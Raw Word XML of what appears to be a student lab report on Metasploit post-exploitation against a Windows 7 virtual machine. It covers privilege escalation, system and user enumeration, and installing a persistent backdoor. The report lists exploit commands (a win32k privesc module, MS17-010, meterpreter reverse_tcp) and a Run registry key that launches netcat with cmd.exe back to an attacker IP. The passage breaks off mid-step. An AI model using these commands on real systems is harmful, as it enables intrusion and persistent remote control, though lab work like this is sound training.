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DD625" w14:textId="616FE604" w:rsidR="001F7A53" w:rsidRPr="001D5FF1" w:rsidRDefault="00CE4F47">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D5FF1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Question 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D8F217" w14:textId="5EC8910C" w:rsidR="00CE4F47" w:rsidRDefault="00CE4F47" w:rsidP="00CE4F47">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01775F1E" w14:textId="5CB5D4CD" w:rsidR="0009272B" w:rsidRDefault="0009272B" w:rsidP="008E1DCB">
      <w:pPr>
        <w:ind w:left="7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22A72B" wp14:editId="3C786F10">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>321945</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="5074285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1DCB">
        <w:t>1.1</w:t>
      </w:r>
      <w:r w:rsidR="00B11EBF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EA7561">
        <w:t>proof</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113D0178" w14:textId="77777777" w:rsidR="008E1DCB" w:rsidRDefault="008E1DCB" w:rsidP="0009272B"/>
    <w:p w14:paraId="3F4D604F" w14:textId="77777777" w:rsidR="008E1DCB" w:rsidRDefault="008E1DCB" w:rsidP="0009272B">
      <w:r>
        <w:t>1.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CDCE26" w14:textId="6910A794" w:rsidR="008E1DCB" w:rsidRDefault="008E1DCB" w:rsidP="0009272B">
      <w:r>
        <w:tab/>
        <w:t>a.</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Step list:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF9CC4E" w14:textId="3BE044E4" w:rsidR="008E1DCB" w:rsidRDefault="008E1DCB" w:rsidP="0009272B">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="00197EFD">
        <w:t xml:space="preserve"> background </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BFA3D7" w14:textId="356FC1C4" w:rsidR="00197EFD" w:rsidRDefault="00197EFD" w:rsidP="0009272B">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00EB0638">
        <w:t xml:space="preserve"> use exploit/windows/local/ms18_8120_win32k_privesc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712A4375" w14:textId="047D1DE4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tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>set payload windows/x64/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meterpreter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reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4EF055EB" w14:textId="546987AF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</w:p>
    <w:p w14:paraId="6F872C1F" w14:textId="47985333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4. show targets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BC97F4" w14:textId="3E2BD224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</w:p>
    <w:p w14:paraId="32298B64" w14:textId="02E8294C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5. set target 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F84F498" w14:textId="607C7C0C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</w:p>
    <w:p w14:paraId="22AFD232" w14:textId="7B8B6E71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6. set session 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F18CCE7" w14:textId="65798A77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2C1DB30" w14:textId="1336E26C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</w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">7. set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4443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B990EB2" w14:textId="50856E3F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8. exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E336D6" w14:textId="10237479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</w:p>
    <w:p w14:paraId="3B37EFD8" w14:textId="1D0A364F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 xml:space="preserve">9.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getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="12E86626" w14:textId="78A38842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4AF3E9E" w14:textId="37EBFD10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 xml:space="preserve">10.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getpid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="73582F78" w14:textId="1921F493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6B0671F" w14:textId="5D3EFD69" w:rsidR="00EB0638" w:rsidRDefault="00EB0638" w:rsidP="00EB063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 xml:space="preserve">11.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getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1B6952F9" w14:textId="7D6AC7BA" w:rsidR="00EB0638" w:rsidRDefault="00EB0638" w:rsidP="0009272B"/>
    <w:p w14:paraId="6AA7DE5C" w14:textId="15F65EBF" w:rsidR="008E1DCB" w:rsidRDefault="008E1DCB" w:rsidP="0009272B">
      <w:r>
        <w:tab/>
        <w:t>b.</w:t>
      </w:r>
      <w:r w:rsidR="00B11EBF">
        <w:t xml:space="preserve"> proof</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE835E1" w14:textId="15495ED4" w:rsidR="00197EFD" w:rsidRDefault="00197EFD" w:rsidP="0009272B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3AC7B07A" wp14:editId="039B4E21">
            <wp:extent cx="5731510" cy="49047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C853" w14:textId="1B88EFFB" w:rsidR="0009272B" w:rsidRDefault="0009272B" w:rsidP="0009272B"/>
    <w:p w14:paraId="7129E9FB" w14:textId="1214502E" w:rsidR="008314C1" w:rsidRDefault="008314C1" w:rsidP="008314C1">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>1.3</w:t>
      </w:r>
      <w:r w:rsidR="00B11EBF">
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00B11EBF">
        <w:t xml:space="preserve"> Kill Session 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70023306" w14:textId="77777777" w:rsidR="008314C1" w:rsidRDefault="008314C1" w:rsidP="008314C1">
      <w:r>
        <w:tab/>
        <w:t>a.</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Step list:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6C67B1" w14:textId="77777777" w:rsidR="008314C1" w:rsidRDefault="008314C1" w:rsidP="008314C1">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">1. background </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD2A42E" w14:textId="014C4D9C" w:rsidR="008314C1" w:rsidRDefault="008314C1" w:rsidP="008314C1">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>2. sessions -k 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4713B0DA" w14:textId="77777777" w:rsidR="00B11EBF" w:rsidRDefault="00B11EBF" w:rsidP="008314C1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="615F0719" w14:textId="77777777" w:rsidR="00B11EBF" w:rsidRDefault="00B11EBF" w:rsidP="008314C1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EB3C232" w14:textId="77777777" w:rsidR="00B11EBF" w:rsidRDefault="00B11EBF" w:rsidP="008314C1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="255A07FC" w14:textId="77777777" w:rsidR="00B11EBF" w:rsidRDefault="00B11EBF" w:rsidP="008314C1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00708DFD" w14:textId="4CE6B728" w:rsidR="008314C1" w:rsidRDefault="008314C1" w:rsidP="008314C1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>b.</w:t>
      </w:r>
      <w:r w:rsidR="00B11EBF">
        <w:t xml:space="preserve"> proof</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEDB025" w14:textId="77777777" w:rsidR="008314C1" w:rsidRDefault="008314C1" w:rsidP="008314C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F6B4034" w14:textId="73556403" w:rsidR="008314C1" w:rsidRDefault="00B11EBF" w:rsidP="0009272B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2DEAC951" wp14:editId="639F874C">
            <wp:extent cx="5731510" cy="48374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9509" w14:textId="2A06096B" w:rsidR="00B4015B" w:rsidRDefault="00B4015B">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A4180D" w14:textId="7EFA5C49" w:rsidR="001D5FF1" w:rsidRPr="001D5FF1" w:rsidRDefault="001D5FF1" w:rsidP="001D5FF1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D5FF1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Question </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB01B08" w14:textId="31E506B1" w:rsidR="00CE4F47" w:rsidRDefault="00CE4F47" w:rsidP="00CE4F47">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Information Gathering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE00B16" w14:textId="322AE962" w:rsidR="005455A1" w:rsidRDefault="005455A1" w:rsidP="005455A1">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="33481F28" w14:textId="3FD6C3BF" w:rsidR="005455A1" w:rsidRDefault="005455A1" w:rsidP="005455A1">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>a. proof</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D204609" w14:textId="3BA238AA" w:rsidR="005455A1" w:rsidRDefault="00B4015B" w:rsidP="005455A1">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5964980A" wp14:editId="6ACF6866">
            <wp:extent cx="5731510" cy="4857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C915" w14:textId="5F8AF4F5" w:rsidR="00B4015B" w:rsidRDefault="00B4015B" w:rsidP="00B4015B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3409080A" w14:textId="77777777" w:rsidR="00B4015B" w:rsidRDefault="00B4015B" w:rsidP="00B4015B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>b. Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59862DEA" w14:textId="77777777" w:rsidR="00B4015B" w:rsidRDefault="00B4015B" w:rsidP="00B4015B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. Computer: Computer name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9C5263" w14:textId="77777777" w:rsidR="00B4015B" w:rsidRDefault="00B4015B" w:rsidP="00B4015B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r>
        <w:t>ii. OS: Operating system of machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0711546B" w14:textId="77777777" w:rsidR="00B4015B" w:rsidRDefault="00B4015B" w:rsidP="00B4015B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r>
        <w:t>iii. Architecture: OS architecture/type (x64 or x86)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE0460B" w14:textId="77777777" w:rsidR="00B4015B" w:rsidRDefault="00B4015B" w:rsidP="00B4015B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r>
        <w:t>iv. System Language: Installed language of OS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEBDE2D" w14:textId="77777777" w:rsidR="00B4015B" w:rsidRDefault="00B4015B" w:rsidP="00B4015B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">v. Domain: Domain where machine is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>included</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="70E43C09" w14:textId="77630F7A" w:rsidR="00B4015B" w:rsidRDefault="00B4015B" w:rsidP="00B4015B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">vi. Logged on Users: shows how many users are using the system (Alex and admin through </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E55BEE5" w14:textId="42E4134C" w:rsidR="00B4015B" w:rsidRDefault="00B4015B" w:rsidP="00B4015B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r>
        <w:t>vii. Meterpreter: exploit type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520CF347" w14:textId="77777777" w:rsidR="002E318E" w:rsidRDefault="00B4015B" w:rsidP="00B4015B">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C76146" w14:textId="77777777" w:rsidR="002E318E" w:rsidRDefault="002E318E">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C51C6E" w14:textId="55DDCB26" w:rsidR="00B4015B" w:rsidRDefault="00B4015B" w:rsidP="00B4015B">
      <w:r>
        <w:t>2.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251C6730" w14:textId="3F69CD0D" w:rsidR="00B4015B" w:rsidRDefault="00B4015B" w:rsidP="00B4015B">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>a. proof</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EC39B9" w14:textId="4B58B330" w:rsidR="00B4015B" w:rsidRDefault="002E318E" w:rsidP="00B4015B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24DF0B89" wp14:editId="3AA11474">
            <wp:extent cx="5731510" cy="48393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24EA" w14:textId="77777777" w:rsidR="00671AEE" w:rsidRDefault="00671AEE" w:rsidP="00671AEE">
      <w:pPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="76500523" w14:textId="50318CDB" w:rsidR="00671AEE" w:rsidRDefault="00671AEE" w:rsidP="00671AEE">
      <w:pPr>
        <w:ind w:left="1080" w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">b. There are </w:t>
      </w:r>
      <w:r w:rsidRPr="00671AEE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">5 users </w:t>
      </w:r>
      <w:r>
        <w:t>currently available in WIN</w:t>
      </w:r>
      <w:r w:rsidR="00D8760E">
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>VM</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5868B695" w14:textId="071E76E8" w:rsidR="00A639A6" w:rsidRDefault="00A639A6" w:rsidP="00A639A6">
      <w:pPr>
        <w:ind w:left="1080" w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>c. Account names</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A320F0F" w14:textId="6824B5F0" w:rsidR="00A639A6" w:rsidRDefault="00A639A6" w:rsidP="00A639A6">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="360"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. Admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BF6109" w14:textId="6733D2D3" w:rsidR="00A639A6" w:rsidRDefault="00A639A6" w:rsidP="00A639A6">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ii. Administrator </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A101C0" w14:textId="770FF7AC" w:rsidR="00A639A6" w:rsidRDefault="00A639A6" w:rsidP="00A639A6">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>iii. Alex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CCF480" w14:textId="60B215A8" w:rsidR="00A639A6" w:rsidRDefault="00A639A6" w:rsidP="00A639A6">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>iv. Guest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CC8C7F" w14:textId="617D681F" w:rsidR="00A639A6" w:rsidRDefault="00A639A6" w:rsidP="00A639A6">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">v. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HomeGroupUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4669F53E" w14:textId="5A1D0BFD" w:rsidR="00A639A6" w:rsidRDefault="00A639A6">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2761CD2B" w14:textId="19861E80" w:rsidR="001D5FF1" w:rsidRPr="001D5FF1" w:rsidRDefault="001D5FF1" w:rsidP="001D5FF1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D5FF1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Question </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AA283D" w14:textId="69F21A59" w:rsidR="00CE4F47" w:rsidRDefault="00CE4F47" w:rsidP="00CE4F47">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Installing backdoors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E9A579" w14:textId="0115587E" w:rsidR="00A639A6" w:rsidRDefault="00A639A6" w:rsidP="00A639A6">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1 Upload </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to target host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F271CE3" w14:textId="7952CC46" w:rsidR="004D2457" w:rsidRDefault="004D2457" w:rsidP="00A639A6">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">a. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Steps</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> list:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205FF713" w14:textId="013B097C" w:rsidR="004D2457" w:rsidRDefault="004D2457" w:rsidP="004D2457">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1440" w:firstLine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t>1.</w:t>
      </w:r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ab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sudo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service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start </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AA4ACE" w14:textId="43D5EEE8" w:rsidR="004D2457" w:rsidRDefault="004D2457" w:rsidP="004D2457">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1440" w:firstLine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2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D2457">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D2457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4D2457">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="71D1B4AC" w14:textId="69D34194" w:rsidR="004D2457" w:rsidRDefault="004D2457" w:rsidP="004D2457">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1440" w:firstLine="3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3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>search ms17-010</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150D315C" w14:textId="37359ACF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2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362B481A" w14:textId="53351B8E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set payload windows/x64/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meterpreter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reverse_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tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3579D155" w14:textId="1E80C534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show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options</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4D1A12BD" w14:textId="3059BCF3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set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rhosts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192.168.1.101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB27058" w14:textId="7DAB9D52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exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBF4A9A" w14:textId="1FA98F1E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getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="46E44080" w14:textId="31DFAB16" w:rsidR="00FC6926" w:rsidRDefault="00FC6926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shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E23297A" w14:textId="0514B609" w:rsidR="004D2457" w:rsidRDefault="004D2457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upload </w:t>
      </w:r>
      <w:r w:rsidR="00FC6926">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>c:\bin\nc.exe c:\windos\system32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06982222" w14:textId="457F8C26" w:rsidR="00FC6926" w:rsidRDefault="00FC6926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reg add HKLM\software\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microsoft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\windows\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currentversion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\run /v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/d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-d -e cmd.exe 192.168.1.102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22”</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="49306CE3" w14:textId="61C055B8" w:rsidR="00857F69" w:rsidRDefault="00857F69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sudo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vlp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22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA56B48" w14:textId="3A10AA0A" w:rsidR="00857F69" w:rsidRDefault="00857F69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restart win7 VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C58096A" w14:textId="493B0BB5" w:rsidR="00857F69" w:rsidRDefault="00857F69" w:rsidP="004D2457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login to admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408F5125" w14:textId="503DDDEB" w:rsidR="00406655" w:rsidRPr="00406655" w:rsidRDefault="00857F69" w:rsidP="00406655">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="216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857F69">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">reg </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>query</w:t>
      </w:r>
      <w:r w:rsidRPr="00857F69">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> HKLM\software\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00857F69">
